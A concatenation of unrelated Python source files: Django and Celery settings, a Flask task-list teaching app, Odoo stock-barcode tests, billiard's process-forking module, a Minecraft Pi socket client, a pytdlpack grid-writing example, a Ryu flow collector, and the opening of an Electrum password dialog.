SOCIAL_AUTH_FACEBOOK_KEY = 'update me'
SOCIAL_AUTH_FACEBOOK_SECRET = 'update me'
SOCIAL_AUTH_FACEBOOK_SCOPE = ['email']
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id,name,email',
}
SWAGGER_SETTINGS = {
'DOC_EXPANSION': 'list',
'APIS_SORTER': 'alpha',
'JSON_EDITOR': True,
'OPERATIONS_SORTER': 'alpha',
'USE_SESSION_AUTH': False,
'SHOW_REQUEST_HEADERS': True,
'SECURITY_DEFINITIONS': {
'token': {
'type': 'apiKey',
'name': 'authorization',
'description': 'The valid api_key should be: "Token xxxxxxxxxxx"',
'in': 'header'
},
},
}
# For celery
CELERY_BROKER_URL = 'amqp://localhost'
CELERY_RESULT_BACKEND = 'amqp://localhost'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
DEFAULT_VISION_DISTANCE = 1000 # m
DEFAULT_MEETING_DISTANCE = 10 # m
QR_LENGTH = 16
DEFAULT_PAGINATION = 20
try:
from local_settings import *
except:
print("NO LOCAL SETTINGS")
|
import sqlite3
from flask import Flask, render_template, g, request, session, flash, redirect, url_for, abort
DATABASE = 'test.db'
USERNAME = 'admin'
PASSWORD = 'admin'
SECRET_KEY = 'he who shall not be named'
app = Flask(__name__)
app.config.from_object(__name__)
@app.route('/')
def welcome():
return '<h1>Welcome to COMPUT 410 - Jinja Lab!</h1>'
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['USERNAME']:
error = 'invalid username'
elif request.form['password'] != app.config['PASSWORD']:
error = 'invalid password'
else:
session['logged_in'] = True
flash("You are logged in :-)")
return redirect(url_for('task'))
return render_template('login.html', error=error)
@app.route('/logout')
def logout():
session.pop('logged_in')
flash("You are logged out!")
return redirect(url_for('task'))
@app.route('/delete', methods=['GET', 'POST'])
def delete():
if not session.get('logged_in'):
abort(401)
removetask(request.form['id'])
flash('Task was deleted successfully!')
return redirect(url_for('task'))
@app.route('/task', methods=['GET', 'POST'])
def task():
if request.method == 'POST':
if not session.get('logged_in'):
abort(401)
category = request.form['category']
priority = request.form['priority']
description = request.form['description']
addtask(category, priority, description)
flash("New task added successfully")
return redirect(url_for('task'))
return render_template('show_entries.html', tasks=query_db('select * from tasks'))
def query_db(query, args=(), one=False):
cur = get_db().cursor()
cur.execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
db.row_factory = sqlite3.Row
return db
def removetask(id):
query_db('delete from tasks where id = ?', [id], True)
get_db().commit()
def addtask(category, priority, description):
query_db('insert into tasks values (null, ?, ?, ?)', [category, priority, description], True)
get_db().commit()
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
db = None
if __name__ == '__main__':
app.debug = True
app.run()
|
# Copyright 2108-2019 Sergio Teruel <sergio.teruel@tecnativa.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.addons.stock_barcodes.tests.test_stock_barcodes import\
TestStockBarcodes
class TestStockBarcodesPicking(TestStockBarcodes):
def setUp(self):
super().setUp()
self.ScanReadPicking = self.env['wiz.stock.barcodes.read.picking']
self.stock_picking_model = self.env.ref('stock.model_stock_picking')
# Model Data
self.partner_agrolite = self.env.ref('base.res_partner_2')
self.picking_type_in = self.env.ref('stock.picking_type_in')
self.picking_type_out = self.env.ref('stock.picking_type_out')
self.supplier_location = self.env.ref('stock.stock_location_suppliers')
self.customer_location = self.env.ref('stock.stock_location_customers')
self.stock_location = self.env.ref('stock.stock_location_stock')
self.categ_unit = self.env.ref('uom.product_uom_categ_unit')
self.categ_kgm = self.env.ref('uom.product_uom_categ_kgm')
self.picking_out_01 = self.env['stock.picking'].with_context(
planned_picking=True
).create({
'location_id': self.stock_location.id,
'location_dest_id': self.customer_location.id,
'partner_id': self.partner_agrolite.id,
'picking_type_id': self.picking_type_out.id,
'move_lines': [
(0, 0, {
'name': self.product_tracking.name,
'product_id': self.product_tracking.id,
'product_uom_qty': 3,
'product_uom': self.product_tracking.uom_id.id,
'location_id': self.stock_location.id,
'location_dest_id': self.customer_location.id,
}),
]
})
self.picking_out_02 = self.picking_out_01.copy()
self.picking_in_01 = self.env['stock.picking'].with_context(
planned_picking=True
).create({
'location_id': self.supplier_location.id,
'location_dest_id': self.stock_location.id,
'partner_id': self.partner_agrolite.id,
'picking_type_id': self.picking_type_in.id,
'move_lines': [
(0, 0, {
'name': self.product_wo_tracking.name,
'product_id': self.product_wo_tracking.id,
'product_uom_qty': 3,
'product_uom': self.product_wo_tracking.uom_id.id,
'location_id': self.supplier_location.id,
'location_dest_id': self.stock_location.id,
}),
(0, 0, {
'name': self.product_wo_tracking.name,
'product_id': self.product_wo_tracking.id,
'product_uom_qty': 5,
'product_uom': self.product_wo_tracking.uom_id.id,
'location_id': self.supplier_location.id,
'location_dest_id': self.stock_location.id,
}),
(0, 0, {
'name': self.product_tracking.name,
'product_id': self.product_tracking.id,
'product_uom_qty': 3,
'product_uom': self.product_tracking.uom_id.id,
'location_id': self.supplier_location.id,
'location_dest_id': self.stock_location.id,
}),
(0, 0, {
'name': self.product_tracking.name,
'product_id': self.product_tracking.id,
'product_uom_qty': 5,
'product_uom': self.product_tracking.uom_id.id,
'location_id': self.supplier_location.id,
'location_dest_id': self.stock_location.id,
}),
]
})
self.picking_in_01.action_confirm()
vals = self.picking_in_01.action_barcode_scan()
self.wiz_scan_picking = self.ScanReadPicking.with_context(
vals['context']
).create({})
def test_wiz_picking_values(self):
self.assertEqual(self.wiz_scan_picking.location_id,
self.picking_in_01.location_dest_id)
self.assertEqual(self.wiz_scan_picking.res_model_id,
self.stock_picking_model)
self.assertEqual(self.wiz_scan_picking.res_id,
self.picking_in_01.id)
self.assertIn(
"Barcode reader - %s - " % (self.picking_in_01.name),
self.wiz_scan_picking.display_name,
)
def test_picking_wizard_scan_product(self):
self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
self.assertEqual(
self.wiz_scan_picking.product_id, self.product_wo_tracking)
sml = self.picking_in_01.move_line_ids.filtered(
lambda x: x.product_id == self.product_wo_tracking)
self.assertEqual(sml.qty_done, 1.0)
# Scan product with tracking lot enable
self.action_barcode_scanned(self.wiz_scan_picking, '8433281006850')
sml = self.picking_in_01.move_line_ids.filtered(
lambda x: x.product_id == self.product_tracking)
self.assertEqual(sml.qty_done, 0.0)
self.assertEqual(self.wiz_scan_picking.message,
'Barcode: 8433281006850 (Waiting for input lot)')
# Scan a lot. Increment quantities if scan product or other lot from
# this product
self.action_barcode_scanned(self.wiz_scan_picking, '8411822222568')
sml = self.picking_in_01.move_line_ids.filtered(
lambda x: x.product_id == self.product_tracking and x.lot_id)
self.assertEqual(sml.lot_id, self.lot_1)
self.assertEqual(sml.qty_done, 1.0)
self.action_barcode_scanned(self.wiz_scan_picking, '8433281006850')
self.assertEqual(sml.qty_done, 2.0)
self.action_barcode_scanned(self.wiz_scan_picking, '8411822222568')
self.assertEqual(sml.qty_done, 3.0)
self.assertEqual(self.wiz_scan_picking.message,
'Barcode: 8411822222568 (Barcode read correctly)')
# Scan a package
self.action_barcode_scanned(self.wiz_scan_picking, '5420008510489')
# Package of 5 product units. Already three unit exists
self.assertEqual(sml.qty_done, 8.0)
def test_picking_wizard_scan_product_manual_entry(self):
self.wiz_scan_picking.manual_entry = True
self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
self.assertEqual(self.wiz_scan_picking.product_id,
self.product_wo_tracking)
sml = self.picking_in_01.move_line_ids.filtered(
lambda x: x.product_id == self.product_wo_tracking)
self.assertEqual(self.wiz_scan_picking.product_qty, 0.0)
self.wiz_scan_picking.product_qty = 12.0
self.wiz_scan_picking.action_manual_entry()
self.assertEqual(sml.qty_done, 8.0)
self.assertEqual(sml.move_id.quantity_done, 12.0)
def test_picking_wizard_remove_last_scan(self):
self.action_barcode_scanned(self.wiz_scan_picking, '8480000723208')
self.assertEqual(self.wiz_scan_picking.product_id,
self.product_wo_tracking)
sml = self.picking_in_01.move_line_ids.filtered(
lambda x: x.product_id == self.product_wo_tracking)
self.assertEqual(sml.qty_done, 1.0)
self.wiz_scan_picking.action_undo_last_scan()
self.assertEqual(sml.qty_done, 0.0)
self.assertEqual(self.wiz_scan_picking.picking_product_qty, 0.0)
def test_barcode_from_operation(self):
picking_out_3 = self.picking_out_01.copy()
self.picking_out_01.action_assign()
self.picking_out_02.action_assign()
vals = self.picking_type_out.action_barcode_scan()
self.wiz_scan_picking = self.ScanReadPicking.with_context(
vals['context']
).create({})
self.wiz_scan_picking.manual_entry = True
self.wiz_scan_picking.product_id = self.product_tracking
self.wiz_scan_picking.lot_id = self.lot_1
self.wiz_scan_picking.product_qty = 2
self.wiz_scan_picking.action_manual_entry()
self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 2)
# Lock first picking
candidate = self.wiz_scan_picking.candidate_picking_ids.filtered(
lambda c: c.picking_id == self.picking_out_01)
candidate_wiz = candidate.with_context(
wiz_barcode_id=self.wiz_scan_picking.id,
picking_id=self.picking_out_01.id,
)
candidate_wiz.action_lock_picking()
self.assertEqual(self.picking_out_01.move_lines.quantity_done, 2)
self.wiz_scan_picking.action_manual_entry()
self.assertEqual(self.picking_out_01.move_lines.quantity_done, 4)
# Picking out 3 is in confirmed state, so until confirmed moves has
# not been activated candidate pickings is 2
picking_out_3.action_confirm()
candidate_wiz.action_unlock_picking()
self.wiz_scan_picking.action_manual_entry()
self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 2)
self.wiz_scan_picking.confirmed_moves = True
candidate_wiz.action_unlock_picking()
self.wiz_scan_picking.action_manual_entry()
self.assertEqual(len(self.wiz_scan_picking.candidate_picking_ids), 3)
|
#
# Module for starting a process object using os.fork() or CreateProcess()
#
# multiprocessing/forking.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
import os
import sys
import signal
import warnings
from ._ext import Connection, PipeConnection, win32
from pickle import load, HIGHEST_PROTOCOL
from billiard import util, process
__all__ = ['Popen', 'assert_spawning', 'exit',
'duplicate', 'close', 'ForkingPickler']
try:
WindowsError = WindowsError # noqa
except NameError:
class WindowsError(Exception): pass # noqa
W_OLD_DJANGO_LAYOUT = """\
Will add directory %r to path! This is necessary to accommodate \
pre-Django 1.4 layouts using setup_environ.
You can skip this warning by adding a DJANGO_SETTINGS_MODULE=settings \
environment variable.
"""
#
# Choose whether to do a fork or spawn (fork+exec) on Unix.
# This affects how some shared resources should be created.
#
_forking_is_enabled = sys.platform != 'win32'
#
# Check that the current thread is spawning a child process
#
def assert_spawning(self):
if not Popen.thread_is_spawning():
raise RuntimeError(
'%s objects should only be shared between processes'
' through inheritance' % type(self).__name__
)
#
# Try making some callable types picklable
#
from pickle import Pickler
if sys.version_info[0] == 3:
from copyreg import dispatch_table
class ForkingPickler(Pickler):
_extra_reducers = {}
def __init__(self, *args, **kwargs):
Pickler.__init__(self, *args, **kwargs)
self.dispatch_table = dispatch_table.copy()
self.dispatch_table.update(self._extra_reducers)
@classmethod
def register(cls, type, reduce):
cls._extra_reducers[type] = reduce
def _reduce_method(m):
if m.__self__ is None:
return getattr, (m.__class__, m.__func__.__name__)
else:
return getattr, (m.__self__, m.__func__.__name__)
class _C:
def f(self):
pass
ForkingPickler.register(type(_C().f), _reduce_method)
else:
class ForkingPickler(Pickler): # noqa
dispatch = Pickler.dispatch.copy()
@classmethod
def register(cls, type, reduce):
def dispatcher(self, obj):
rv = reduce(obj)
self.save_reduce(obj=obj, *rv)
cls.dispatch[type] = dispatcher
def _reduce_method(m): # noqa
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
ForkingPickler.register(type(ForkingPickler.save), _reduce_method)
def _reduce_method_descriptor(m):
return getattr, (m.__objclass__, m.__name__)
ForkingPickler.register(type(list.append), _reduce_method_descriptor)
ForkingPickler.register(type(int.__add__), _reduce_method_descriptor)
try:
from functools import partial
except ImportError:
pass
else:
def _reduce_partial(p):
return _rebuild_partial, (p.func, p.args, p.keywords or {})
def _rebuild_partial(func, args, keywords):
return partial(func, *args, **keywords)
ForkingPickler.register(partial, _reduce_partial)
def dump(obj, file, protocol=None):
ForkingPickler(file, protocol).dump(obj)
#
# Make (Pipe)Connection picklable
#
def reduce_connection(conn):
# XXX check not necessary since only registered with ForkingPickler
if not Popen.thread_is_spawning():
raise RuntimeError(
'By default %s objects can only be shared between processes\n'
'using inheritance' % type(conn).__name__
)
return type(conn), (Popen.duplicate_for_child(conn.fileno()),
conn.readable, conn.writable)
ForkingPickler.register(Connection, reduce_connection)
if PipeConnection:
ForkingPickler.register(PipeConnection, reduce_connection)
#
# Unix
#
if sys.platform != 'win32':
import thread
import select
WINEXE = False
WINSERVICE = False
exit = os._exit
duplicate = os.dup
close = os.close
_select = util._eintr_retry(select.select)
#
# We define a Popen class similar to the one from subprocess, but
# whose constructor takes a process object as its argument.
#
class Popen(object):
_tls = thread._local()
def __init__(self, process_obj):
_Django_old_layout_hack__save()
sys.stdout.flush()
sys.stderr.flush()
self.returncode = None
r, w = os.pipe()
self.sentinel = r
if _forking_is_enabled:
self.pid = os.fork()
if self.pid == 0:
os.close(r)
if 'random' in sys.modules:
import random
random.seed()
code = process_obj._bootstrap()
os._exit(code)
else:
from_parent_fd, to_child_fd = os.pipe()
cmd = get_command_line() + [str(from_parent_fd)]
self.pid = os.fork()
if self.pid == 0:
os.close(r)
os.close(to_child_fd)
os.execv(sys.executable, cmd)
# send information to child
prep_data = get_preparation_data(process_obj._name)
os.close(from_parent_fd)
to_child = os.fdopen(to_child_fd, 'wb')
Popen._tls.process_handle = self.pid
try:
dump(prep_data, to_child, HIGHEST_PROTOCOL)
dump(process_obj, to_child, HIGHEST_PROTOCOL)
finally:
del(Popen._tls.process_handle)
to_child.close()
# `w` will be closed when the child exits, at which point `r`
# will become ready for reading (using e.g. select()).
os.close(w)
util.Finalize(self, os.close, (r,))
def poll(self, flag=os.WNOHANG):
if self.returncode is None:
try:
pid, sts = os.waitpid(self.pid, flag)
except os.error:
# Child process not yet created. See #1731717
# e.errno == errno.ECHILD == 10
return None
if pid == self.pid:
if os.WIFSIGNALED(sts):
self.returncode = -os.WTERMSIG(sts)
else:
assert os.WIFEXITED(sts)
self.returncode = os.WEXITSTATUS(sts)
return self.returncode
def wait(self, timeout=None):
if self.returncode is None:
if timeout is not None:
r = _select([self.sentinel], [], [], timeout)[0]
if not r:
return None
# This shouldn't block if select() returned successfully.
return self.poll(os.WNOHANG if timeout == 0.0 else 0)
return self.returncode
def terminate(self):
if self.returncode is None:
try:
os.kill(self.pid, signal.SIGTERM)
except OSError:
if self.wait(timeout=0.1) is None:
raise
@staticmethod
def thread_is_spawning():
if _forking_is_enabled:
return False
else:
return getattr(Popen._tls, 'process_handle', None) is not None
@staticmethod
def duplicate_for_child(handle):
return handle
#
# Windows
#
else:
import thread
import msvcrt
import _subprocess
#
#
#
TERMINATE = 0x10000
WINEXE = (sys.platform == 'win32' and getattr(sys, 'frozen', False))
WINSERVICE = sys.executable.lower().endswith("pythonservice.exe")
exit = win32.ExitProcess
close = win32.CloseHandle
#
#
#
def duplicate(handle, target_process=None, inheritable=False):
if target_process is None:
target_process = _subprocess.GetCurrentProcess()
return _subprocess.DuplicateHandle(
_subprocess.GetCurrentProcess(), handle, target_process,
0, inheritable, _subprocess.DUPLICATE_SAME_ACCESS
).Detach()
#
# We define a Popen class similar to the one from subprocess, but
# whose constructor takes a process object as its argument.
#
class Popen(object):
'''
Start a subprocess to run the code of a process object
'''
_tls = thread._local()
def __init__(self, process_obj):
_Django_old_layout_hack__save()
# create pipe for communication with child
rfd, wfd = os.pipe()
# get handle for read end of the pipe and make it inheritable
rhandle = duplicate(msvcrt.get_osfhandle(rfd), inheritable=True)
os.close(rfd)
# start process
cmd = get_command_line() + [rhandle]
cmd = ' '.join('"%s"' % x for x in cmd)
hp, ht, pid, tid = _subprocess.CreateProcess(
_python_exe, cmd, None, None, 1, 0, None, None, None
)
ht.Close()
close(rhandle)
# set attributes of self
self.pid = pid
self.returncode = None
self._handle = hp
self.sentinel = int(hp)
# send information to child
prep_data = get_preparation_data(process_obj._name)
to_child = os.fdopen(wfd, 'wb')
Popen._tls.process_handle = int(hp)
try:
dump(prep_data, to_child, HIGHEST_PROTOCOL)
dump(process_obj, to_child, HIGHEST_PROTOCOL)
finally:
del Popen._tls.process_handle
to_child.close()
@staticmethod
def thread_is_spawning():
return getattr(Popen._tls, 'process_handle', None) is not None
@staticmethod
def duplicate_for_child(handle):
return duplicate(handle, Popen._tls.process_handle)
def wait(self, timeout=None):
if self.returncode is None:
if timeout is None:
msecs = _subprocess.INFINITE
else:
msecs = max(0, int(timeout * 1000 + 0.5))
res = _subprocess.WaitForSingleObject(int(self._handle), msecs)
if res == _subprocess.WAIT_OBJECT_0:
code = _subprocess.GetExitCodeProcess(self._handle)
if code == TERMINATE:
code = -signal.SIGTERM
self.returncode = code
return self.returncode
def poll(self):
return self.wait(timeout=0)
def terminate(self):
if self.returncode is None:
try:
_subprocess.TerminateProcess(int(self._handle), TERMINATE)
except WindowsError:
if self.wait(timeout=0.1) is None:
raise
#
#
#
if WINSERVICE:
_python_exe = os.path.join(sys.exec_prefix, 'python.exe')
else:
_python_exe = sys.executable
def set_executable(exe):
global _python_exe
_python_exe = exe
def is_forking(argv):
'''
Return whether commandline indicates we are forking
'''
if len(argv) >= 2 and argv[1] == '--billiard-fork':
assert len(argv) == 3
os.environ["FORKED_BY_MULTIPROCESSING"] = "1"
return True
else:
return False
def freeze_support():
'''
Run code for process object if this in not the main process
'''
if is_forking(sys.argv):
main()
sys.exit()
def get_command_line():
'''
Returns prefix of command line used for spawning a child process
'''
if process.current_process()._identity == () and is_forking(sys.argv):
raise RuntimeError('''
Attempt to start a new process before the current process
has finished its bootstrapping phase.
This probably means that have forgotten to use the proper
idiom in the main module:
if __name__ == '__main__':
freeze_support()
...
The "freeze_support()" line can be omitted if the program
is not going to be frozen to produce a Windows executable.''')
if getattr(sys, 'frozen', False):
return [sys.executable, '--billiard-fork']
else:
prog = 'from billiard.forking import main; main()'
return [_python_exe, '-c', prog, '--billiard-fork']
def _Django_old_layout_hack__save():
if 'DJANGO_PROJECT_DIR' not in os.environ:
try:
settings_name = os.environ['DJANGO_SETTINGS_MODULE']
except KeyError:
return # not using Django.
conf_settings = sys.modules.get('django.conf.settings')
configured = conf_settings and conf_settings.configured
try:
project_name, _ = settings_name.split('.', 1)
except ValueError:
return # not modified by setup_environ
project = __import__(project_name)
try:
project_dir = os.path.normpath(_module_parent_dir(project))
except AttributeError:
return # dynamically generated module (no __file__)
if configured:
warnings.warn(UserWarning(
W_OLD_DJANGO_LAYOUT % os.path.realpath(project_dir)
))
os.environ['DJANGO_PROJECT_DIR'] = project_dir
def _Django_old_layout_hack__load():
try:
sys.path.append(os.environ['DJANGO_PROJECT_DIR'])
except KeyError:
pass
def _module_parent_dir(mod):
dir, filename = os.path.split(_module_dir(mod))
if dir == os.curdir or not dir:
dir = os.getcwd()
return dir
def _module_dir(mod):
if '__init__.py' in mod.__file__:
return os.path.dirname(mod.__file__)
return mod.__file__
def main():
'''
Run code specifed by data received over pipe
'''
global _forking_is_enabled
_Django_old_layout_hack__load()
assert is_forking(sys.argv)
_forking_is_enabled = False
handle = int(sys.argv[-1])
if sys.platform == 'win32':
fd = msvcrt.open_osfhandle(handle, os.O_RDONLY)
else:
fd = handle
from_parent = os.fdopen(fd, 'rb')
process.current_process()._inheriting = True
preparation_data = load(from_parent)
prepare(preparation_data)
# Huge hack to make logging before Process.run work.
try:
os.environ["MP_MAIN_FILE"] = sys.modules["__main__"].__file__
except KeyError:
pass
loglevel = os.environ.get("_MP_FORK_LOGLEVEL_")
logfile = os.environ.get("_MP_FORK_LOGFILE_") or None
format = os.environ.get("_MP_FORK_LOGFORMAT_")
if loglevel:
from billiard import util
import logging
logger = util.get_logger()
logger.setLevel(int(loglevel))
if not logger.handlers:
logger._rudimentary_setup = True
logfile = logfile or sys.__stderr__
if hasattr(logfile, "write"):
handler = logging.StreamHandler(logfile)
else:
handler = logging.FileHandler(logfile)
formatter = logging.Formatter(
format or util.DEFAULT_LOGGING_FORMAT)
handler.setFormatter(formatter)
logger.addHandler(handler)
self = load(from_parent)
process.current_process()._inheriting = False
from_parent.close()
exitcode = self._bootstrap()
exit(exitcode)
def get_preparation_data(name):
'''
Return info about parent needed by child to unpickle process object
'''
from billiard.util import _logger, _log_to_stderr
d = dict(
name=name,
sys_path=sys.path,
sys_argv=sys.argv,
log_to_stderr=_log_to_stderr,
orig_dir=process.ORIGINAL_DIR,
authkey=process.current_process().authkey,
)
if _logger is not None:
d['log_level'] = _logger.getEffectiveLevel()
if not WINEXE and not WINSERVICE:
main_path = getattr(sys.modules['__main__'], '__file__', None)
if not main_path and sys.argv[0] not in ('', '-c'):
main_path = sys.argv[0]
if main_path is not None:
if not os.path.isabs(main_path) and \
process.ORIGINAL_DIR is not None:
main_path = os.path.join(process.ORIGINAL_DIR, main_path)
d['main_path'] = os.path.normpath(main_path)
return d
#
# Make (Pipe)Connection picklable
#
def reduce_connection(conn):
if not Popen.thread_is_spawning():
raise RuntimeError(
'By default %s objects can only be shared between processes\n'
'using inheritance' % type(conn).__name__
)
return type(conn), (Popen.duplicate_for_child(conn.fileno()),
conn.readable, conn.writable)
ForkingPickler.register(Connection, reduce_connection)
ForkingPickler.register(PipeConnection, reduce_connection)
#
# Prepare current process
#
old_main_modules = []
def prepare(data):
'''
Try to get current process ready to unpickle process object
'''
old_main_modules.append(sys.modules['__main__'])
if 'name' in data:
process.current_process().name = data['name']
if 'authkey' in data:
process.current_process()._authkey = data['authkey']
if 'log_to_stderr' in data and data['log_to_stderr']:
util.log_to_stderr()
if 'log_level' in data:
util.get_logger().setLevel(data['log_level'])
if 'sys_path' in data:
sys.path = data['sys_path']
if 'sys_argv' in data:
sys.argv = data['sys_argv']
if 'dir' in data:
os.chdir(data['dir'])
if 'orig_dir' in data:
process.ORIGINAL_DIR = data['orig_dir']
if 'main_path' in data:
main_path = data['main_path']
main_name = os.path.splitext(os.path.basename(main_path))[0]
if main_name == '__init__':
main_name = os.path.basename(os.path.dirname(main_path))
if main_name == '__main__':
main_module = sys.modules['__main__']
main_module.__file__ = main_path
elif main_name != 'ipython':
# Main modules not actually called __main__.py may
# contain additional code that should still be executed
import imp
if main_path is None:
dirs = None
elif os.path.basename(main_path).startswith('__init__.py'):
dirs = [os.path.dirname(os.path.dirname(main_path))]
else:
dirs = [os.path.dirname(main_path)]
assert main_name not in sys.modules, main_name
file, path_name, etc = imp.find_module(main_name, dirs)
try:
# We would like to do "imp.load_module('__main__', ...)"
# here. However, that would cause 'if __name__ ==
# "__main__"' clauses to be executed.
main_module = imp.load_module(
'__parents_main__', file, path_name, etc
)
finally:
if file:
file.close()
sys.modules['__main__'] = main_module
main_module.__name__ = '__main__'
# Try to make the potentially picklable objects in
# sys.modules['__main__'] realize they are in the main
# module -- somewhat ugly.
for obj in main_module.__dict__.values():
try:
if obj.__module__ == '__parents_main__':
obj.__module__ = '__main__'
except Exception:
pass
|
"""
This file has been taken from http://pi.minecraft.net/
"""
import socket
import select
import sys
from util import flatten_parameters_to_string
""" @author: Aron Nieminen, Mojang AB"""
class RequestError(Exception):
pass
class Connection:
"""Connection to a Minecraft Pi game"""
RequestFailed = "Fail"
def __init__(self, address, port):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((address, port))
self.lastSent = ""
def drain(self):
"""Drains the socket of incoming data"""
while True:
readable, _, _ = select.select([self.socket], [], [], 0.0)
if not readable:
break
data = self.socket.recv(1500)
e = "Drained Data: <%s>\n"%data.strip()
e += "Last Message: <%s>\n"%self.lastSent.strip()
sys.stderr.write(e)
def send(self, f, *data):
"""Sends data. Note that a trailing newline '\n' is added here"""
s = "%s(%s)\n"%(f, flatten_parameters_to_string(data))
#print "f,data:",f,data
#print "s",s
self.drain()
self.lastSent = s
self.socket.sendall(s)
def receive(self):
"""Receives data. Note that the trailing newline '\n' is trimmed"""
s = self.socket.makefile("r").readline().rstrip("\n")
if s == Connection.RequestFailed:
raise RequestError("%s failed"%self.lastSent.strip())
return s
def sendReceive(self, *data):
"""Sends and receive data"""
self.send(*data)
return self.receive()
|
#!/usr/bin/env python3
# ----------------------------------------------------------------------------------------
# Import Modules
# ----------------------------------------------------------------------------------------
import numpy as np
import setuptools
import sys
platform = setuptools.distutils.util.get_platform()
build_path = './build/lib.'+platform+'-'+str(sys.version_info.major)+'.'+str(sys.version_info.minor)
sys.path.insert(0,build_path)
import pytdlpack
# ----------------------------------------------------------------------------------------
# Create some data
# ----------------------------------------------------------------------------------------
nx = 2345
ny = 1597
date = 2019052900
id = [4210008,10,24,0]
grid_data = np.random.rand(nx,ny)*75.0
grid_data.fill(np.nan)
# ----------------------------------------------------------------------------------------
# Grid Specs: CONUS Lambert-Conformal 2.5km 2345x1597
# ----------------------------------------------------------------------------------------
griddef = pytdlpack.create_grid_definition(proj=3,nx=nx,ny=ny,latll=19.2290,
lonll=233.7234,orientlon=265.,stdlat=25.,meshlength=2.539703)
# ----------------------------------------------------------------------------------------
# Create TDLPACK data record and pack
# ----------------------------------------------------------------------------------------
rec = pytdlpack.TdlpackRecord(date=date,id=id,lead=24,plain="GFS WIND SPEED",
data=grid_data,missing_value=9999.0,grid=griddef)
rec.pack(dec_scale=3)
# ----------------------------------------------------------------------------------------
# Open new sequential file and write the records
# ----------------------------------------------------------------------------------------
f = pytdlpack.open('new_grid.sq',mode='w',format='sequential')
f.write(rec)
f.close()
# ----------------------------------------------------------------------------------------
# Open new random-access file and write the records
# ----------------------------------------------------------------------------------------
fra = pytdlpack.open('new_grid.ra',mode='w',format='random-access',ra_template='large')
fra.write(rec)
fra.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from ryu.base import app_manager
from ryu.ofproto import ofproto_v1_3
from command_sender import CommandSender
'''
###reduce_t###
--> flow collector
1) call rest_api and parse json
'''
class FlowCollector(app_manager.RyuApp):
'''
only collect access switches
'''
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(FlowCollector, self).__init__(*args, **kwargs)
self.flowSender = CommandSender.get_instance()
self.dpids = []
# {dpid:[{"idle_timeout":...,"packet_count":...,"byte_count":...,},{},{},...],
# dpid:[{},{},{]...],...}
self.dpid_to_flow = dict()
def request_stats_switches(self):
res = self.flowSender.get_stats_switches()
return res.json() #list
def request_stats_flow(self, dpid):
res = self.flowSender.get_stats_flow(dpid)
return res.json() # dict
def parse_stats_flow(self,stats_flow):
flow_list = list()
for each_flow in stats_flow:
match = each_flow["match"]
if match.has_key("tp_src") or match.has_key("up_src"):
flow = dict()
flow["idle_timeout"] = each_flow["idle_timeout"]
flow["packet_count"] = each_flow["packet_count"]
flow["byte_count"] = each_flow["byte_count"]
flow["duration_sec"] = each_flow["duration_sec"]
flow["nw_src"] = match["nw_src"]
flow["nw_dst"] = match["nw_dst"]
flow_list.append(flow)
return flow_list
#---------------------Print_to_debug------------------------
def print_stats(self):
for each_dpid in self.dpid_to_flow:
print("----------print_flow_collect_stats--------------")
print "dpid:" + str(each_dpid)
print "flow_num:" + str(len(self.dpid_to_flow[each_dpid]))
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import math
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QLineEdit, QLabel, QGridLayout, QVBoxLayout, QCheckBox
from electrum_mona.i18n import _
from electrum_mona.plugin import run_hook
from .util import (icon_path, WindowModalDialog, OkButton, CancelButton, Buttons,
PasswordLineEdit)
def check_password_strength(password):
'''
Check the strength of the password entered by the user and return back the same
:param password: password entered by user in New Password
:return: password strength Weak or Medium or Strong
'''
password = password
n = math.log(len(set(password)))
num = re.search("[0-9]", password) is not None and re.match("^[0-9]*$", password) is None
caps = password != password.upper() and password != password.lower()
extra = re.match("^[a-zA-Z0-9]*$", password) is None
score = len(password)*(n + caps + num + extra)/20
password_strength = {0:"Weak",1:"Medium",2:"Strong",3:"Very Strong"}
return password_strength[min(3, int(score))]
PW_NEW, PW_CHANGE, PW_PASSPHRASE = range(0, 3)
class PasswordLayout(object):
titles = [_("Enter Password"), _("Change Password"), _("Enter Passphrase")]
